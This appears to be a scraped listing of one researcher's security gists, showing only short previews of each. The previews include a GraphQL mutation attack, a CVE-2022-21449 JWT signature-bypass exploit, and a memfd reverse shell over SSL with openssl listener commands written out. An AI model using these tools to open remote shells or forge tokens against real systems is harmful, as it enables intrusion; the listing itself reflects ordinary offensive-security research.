dualfade

## graphql mutation attack
#!/usr/bin/env python3
# gql_mutation_payload.py
# @dualfade

# NOTE: refs --
# https://dev.to/ivandotv/preventing-graphql-batching-attacks-56o3
# https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html#mutation-access-data-manipulation
# https://devinschulz.com/rename-fields-by-using-aliases-in-graphql/

"""

## cve-2022-21449 jwt ecdsa
#!/usr/bin/env python3
# cve-2022-21449.py
# dualfade --

# refs --
# https://bit.ly/3aVqwsC --
# https://bit.ly/3tw6z1P --

# initial jwt --
# ex: eyJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJ0ZXN0QHBlbnRlc3RlcmxhYi5jb20ifQ. \

## cve-2022-21449
#!/usr/bin/env ruby
# cve-2022-21449
# dualfade --

# rewrite in ruby 3 --

# imports --
require 'bundler/inline'
require 'ecdsa/signature'
require 'ecdsa/format'

## memfd_create_rssl.rb
#!/usr/bin/env ruby
# typed: false

# dualfade --
# memfd_create_rssl.rb --

# NOTE: from sorbet --
# https://sorbet.org/docs/adopting --
# gem 'sorbet-static-and-runtime'
# gem 'tapioca', require: false, :group => :development

## simulate typing to VDI --
#!/bin/bash
# shellcheck disable=SC2059
# simulate_typing.sh
# #dualfade --

# ref --
# tldr xdotool; https://www.mankier.com/1/xdotool --
# tldr xclip; https://linux.die.net/man/1/xclip --

function vdi_clip2win() {

## Gomuks; Remove "Empty Rooms"
gomuks v3.0.0 --
https://github.com/tulir/gomuks

how to remove "Empty Room" in gomuks --
Do the following  --

Ref:
https://github.com/tulir/gomuks/issues/192#issuecomment-760003730

Log in to the chomium element web account

## fingerprint.js
// find javascript gadgets --
// forked => https://gist.github.com/nikitastupin/b3b64a9f8c0eb74ce37626860193eaec
// ref => https://github.com/BlackFan/client-side-prototype-pollution
// ref => https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#prototype-pollution
// updated; @dualfade --

// start --
// check for known gadgets --
(() => {
  // gadgets --

## intercept-network-requests.js
function interceptNetworkRequests(ee) {
    const open = XMLHttpRequest.prototype.open;
    const send = XMLHttpRequest.prototype.send;

    const isRegularXHR = open.toString().indexOf('native code') !== -1;


    // don't hijack if already hijacked - this will mess up with frameworks like Angular with zones
    // we work if we load first there which we can.
    if (isRegularXHR) {

## BurpSuiteSSLPassTrough.json
{
  "proxy": {
    "ssl_pass_through": {
      "automatically_add_entries_on_client_ssl_negotiation_failure": false,
      "rules": [
        {
          "enabled": true,
          "host": ".*\\.google\\.com",
          "protocol": "any"
        },

## memfd_rssl_shell.py
#!/usr/bin/env python3
# memfd_rssl_shell.py
# dualfade

# memfd reverse shell over ssl --
# inspired by; https://0x00sec.org/t/super-stealthy-droppers/3715 --

# ex: server side --
# openssl req -subj '/CN=yourcn.com/O=YourOrg/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem
# openssl s_server -quiet -key server.key -cert server.pem -port 8443
	#!/usr/bin/env python3
	# gql_mutation_payload.py
	# @dualfade

	# NOTE: refs --
	# https://dev.to/ivandotv/preventing-graphql-batching-attacks-56o3
	# https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html#mutation-access-data-manipulation
	# https://devinschulz.com/rename-fields-by-using-aliases-in-graphql/

	"""
	#!/usr/bin/env python3
	# cve-2022-21449.py
	# dualfade --

	# refs --
	# https://bit.ly/3aVqwsC --
	# https://bit.ly/3tw6z1P --

	# initial jwt --
	# ex: eyJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJ0ZXN0QHBlbnRlc3RlcmxhYi5jb20ifQ. \
	#!/usr/bin/env ruby
	# cve-2022-21449
	# dualfade --

	# rewrite in ruby 3 --

	# imports --
	require 'bundler/inline'
	require 'ecdsa/signature'
	require 'ecdsa/format'
	#!/usr/bin/env ruby
	# typed: false

	# dualfade --
	# memfd_create_rssl.rb --

	# NOTE: from sorbet --
	# https://sorbet.org/docs/adopting --
	# gem 'sorbet-static-and-runtime'
	# gem 'tapioca', require: false, :group => :development
	#!/bin/bash
	# shellcheck disable=SC2059
	# simulate_typing.sh
	# #dualfade --

	# ref --
	# tldr xdotool; https://www.mankier.com/1/xdotool --
	# tldr xclip; https://linux.die.net/man/1/xclip --

	function vdi_clip2win() {
	// find javascript gadgets --
	// forked => https://gist.github.com/nikitastupin/b3b64a9f8c0eb74ce37626860193eaec
	// ref => https://github.com/BlackFan/client-side-prototype-pollution
	// ref => https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#prototype-pollution
	// updated; @dualfade --

	// start --
	// check for known gadgets --
	(() => {
	// gadgets --
	function interceptNetworkRequests(ee) {
	const open = XMLHttpRequest.prototype.open;
	const send = XMLHttpRequest.prototype.send;

	const isRegularXHR = open.toString().indexOf('native code') !== -1;


	// don't hijack if already hijacked - this will mess up with frameworks like Angular with zones
	// we work if we load first there which we can.
	if (isRegularXHR) {
	{
	"proxy": {
	"ssl_pass_through": {
	"automatically_add_entries_on_client_ssl_negotiation_failure": false,
	"rules": [
	{
	"enabled": true,
	"host": ".*\\.google\\.com",
	"protocol": "any"
	},
	#!/usr/bin/env python3
	# memfd_rssl_shell.py
	# dualfade

	# memfd reverse shell over ssl --
	# inspired by; https://0x00sec.org/t/super-stealthy-droppers/3715 --

	# ex: server side --
	# openssl req -subj '/CN=yourcn.com/O=YourOrg/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem
	# openssl s_server -quiet -key server.key -cert server.pem -port 8443